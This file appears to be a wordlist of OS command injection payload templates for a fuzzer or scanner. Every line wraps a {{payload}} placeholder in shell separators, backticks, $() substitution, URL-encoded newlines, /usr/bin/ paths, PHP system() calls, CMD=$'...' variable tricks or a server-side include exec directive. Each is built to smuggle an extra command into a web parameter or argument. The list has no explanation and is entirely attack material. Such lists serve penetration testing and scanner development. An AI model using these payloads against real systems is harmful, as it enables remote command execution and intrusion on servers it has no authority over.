/index.html|{{payload}}|
;{{payload}};
;{{payload}}
;{{payload}};
|{{payload}}
|/usr/bin/{{payload}}
|{{payload}}|
|/usr/bin/{{payload}}|
||/usr/bin/{{payload}}|
|{{payload}};
||/usr/bin/{{payload}};
;{{payload}}|
;|/usr/bin/{{payload}}|
\n/usr/bin/{{payload}}\n
\n{{payload}}\n
\n/usr/bin/{{payload}};
\n{{payload}};
\n/usr/bin/{{payload}}|
\n{{payload}}|
;/usr/bin/{{payload}}\n
;{{payload}}\n
|usr/bin/{{payload}}\n
|n{{payload}}\n
`{{payload}}`
`/usr/bin/{{payload}}`
a);{{payload}}
a;{{payload}}
a);{{payload}};
a;{{payload}};
a);{{payload}}|
a;{{payload}}|
a)|{{payload}}
a|{{payload}}
a)|{{payload}};
a|{{payload}}
a);/usr/bin/{{payload}}
a;/usr/bin/{{payload}}
a);/usr/bin/{{payload}};
a;/usr/bin/{{payload}};
a);/usr/bin/{{payload}}|
a;/usr/bin/{{payload}}|
a)|/usr/bin/{{payload}}
a|/usr/bin/{{payload}}
a)|/usr/bin/{{payload}};
a|/usr/bin/{{payload}}
;system('{{payload}}')
;system('{{payload}}')
;system('/usr/bin/{{payload}}')
%0A/usr/bin/{{payload}}
%0A{{payload}}
%0A/usr/bin/{{payload}}%0A
%0A{{payload}}%0A
`ping 127.0.0.1`
| {{payload}}
& {{payload}}
; {{payload}}
%0a {{payload}} %0a
`{{payload}}`
$;/usr/bin/{{payload}}
$({{payload}})
{{payload}}
;{{payload}}
;{{payload}};
^{{payload}}
|{{payload}}
<{{payload}}
<{{payload}};
<{{payload}}\n
<{{payload}}%0D
<{{payload}}%0A
&{{payload}}
&{{payload}}&
&&{{payload}}
&&{{payload}}&&
%0D{{payload}}
%0D{{payload}}%0D
%0A{{payload}}
%0A{{payload}}%0A
\n{{payload}}
\n{{payload}}\n
'{{payload}}'
`{{payload}}`
;{{payload}}|
;{{payload}}/n
|{{payload}};
a);{{payload}}
a;{{payload}}
a);{{payload}}
a;{{payload}};
a);{{payload}}|
FAIL||{{payload}}
CMD=$'{{payload}}';$CMD
;CMD=$'{{payload}}';$CMD
^CMD=$'{{payload}}';$CMD
|CMD=$'{{payload}}';$CMD
&CMD=$'{{payload}}';$CMD
&&CMD=$'{{payload}}';$CMD
%0DCMD=$'{{payload}}';$CMD
FAIL||CMD=$'{{payload}}';$CMD
CMD=$\'{{payload}}\';$CMD
;CMD=$\'{{payload}}\';$CMD
^CMD=$\'{{payload}}\';$CMD
|CMD=$\'{{payload}}\';$CMD
&CMD=$\'{{payload}}\';$CMD
&&CMD=$\'{{payload}}\';$CMD
%0DCMD=$\'{{payload}}\';$CMD
FAIL||CMD=$\'{{payload}}\';$CMD
CMD=$"{{payload}}";$CMD
;CMD=$"{{payload}}";$CMD
^CMD=$"{{payload}}";$CMD
|CMD=$"{{payload}}";$CMD
&CMD=$"{{payload}}";$CMD
&&CMD=$"{{payload}}";$CMD
%0DCMD=$"{{payload}}";$CMD
FAIL||CMD=$"{{payload}}";$CMD
<!--#exec cmd="{{payload}}"-->
;system('{{payload}}')
